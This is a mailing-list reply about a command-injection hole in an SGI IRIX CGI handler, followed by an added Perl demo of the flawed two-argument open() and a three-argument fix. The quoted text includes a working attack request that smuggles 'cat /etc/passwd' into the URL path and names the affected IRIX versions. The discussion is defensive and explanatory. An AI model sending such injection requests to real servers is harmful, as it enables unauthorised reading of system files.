> telnet target.machine.com 80
> GET /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download
> HTTP/1.0
> [...To fix this right...]
> All "open" commands should check if their argument is really a
> filename. You could use:
> -f $doc && open (INPUT, $doc)
If you have untrusted local users who can install their own cgi-bin
stuff (I know of at least one large site that is in this situation),
this isn't enough. /cgi-bin/handler/whatever;cat\t/etc/passwd\|\t may
well exist, and open() will _still_ take it as a pipe.
> So far, IRIX versions 5.3, 6.2, and now 6.3 are vulnerable.
> Anyone on IRIX 6.4? :) (What does it run on BTW?)
I know of one site with an Octane that runs 6.4. I'd try this, but
that site runs exactly one web server, and it ain't SGI's. I could
turn on the web server on the Octane, I suppose, but I'm hesitant to
mess with it....
der Mouse
mouse@rodents.montreal.qc.ca
7D C8 61 52 5D E7 2D 39 4E F1 31 3E E8 B3 27 4B
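The point der Mouse makes above, shown in Perl (an added example, not code from either poster or from the SGI handler script): a file whose name ends in "|" passes the -f test, yet two-argument open() would still treat that name as a pipe and run it. The file name, temp directory and read_document() function are constructed for the demo; three-argument open (or sysopen with O_RDONLY) pins the mode to "read a file" no matter what characters the name contains, so the -f check keeps its job of rejecting directories and missing files without becoming the only thing standing between the request and the shell.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Temp qw(tempdir);

# Constructed demo: a regular file whose NAME ends in "|". Such a name is
# legal on Unix, so a local user who can create files in a path the CGI
# reads from could plant one.
my $dir    = tempdir(CLEANUP => 1);
my $tricky = "$dir/echo hi|";          # hypothetical attacker-chosen name
open(my $mk, '>', $tricky) or die "create: $!";
print $mk "real file contents\n";
close($mk);

# The -f test alone is satisfied: it really is a plain file.
print "-f says: ", (-f $tricky ? "is a file" : "not a file"), "\n";

# Two-argument open, as in the original script, reads the trailing "|" as
# "run this as a command and read its output". Left commented out so the
# demo never executes anything:
#   open(INPUT, $tricky);            # would run `echo hi` through the shell

# Hardened version: keep the -f check, but open with an explicit mode so the
# name is always taken literally. Returns the contents or undef.
sub read_document {
    my ($doc) = @_;
    return undef unless -f $doc;                 # no dirs, devices, missing
    open(my $fh, '<', $doc) or return undef;     # 3-arg: never pipe mode
    local $/;                                    # slurp
    my $data = <$fh>;
    close($fh);
    return $data;
}

my $got = read_document($tricky);
print "three-arg open read: ", defined $got ? $got : "(failed)\n";
```

Running this prints "-f says: is a file" followed by the literal contents of the oddly named file; swapping the commented two-argument open back in would instead execute the name. For a CGI that builds $doc from the request path, the explicit mode is the minimal fix; confining $doc to a fixed document directory and a conservative character set is a separate, additional layer.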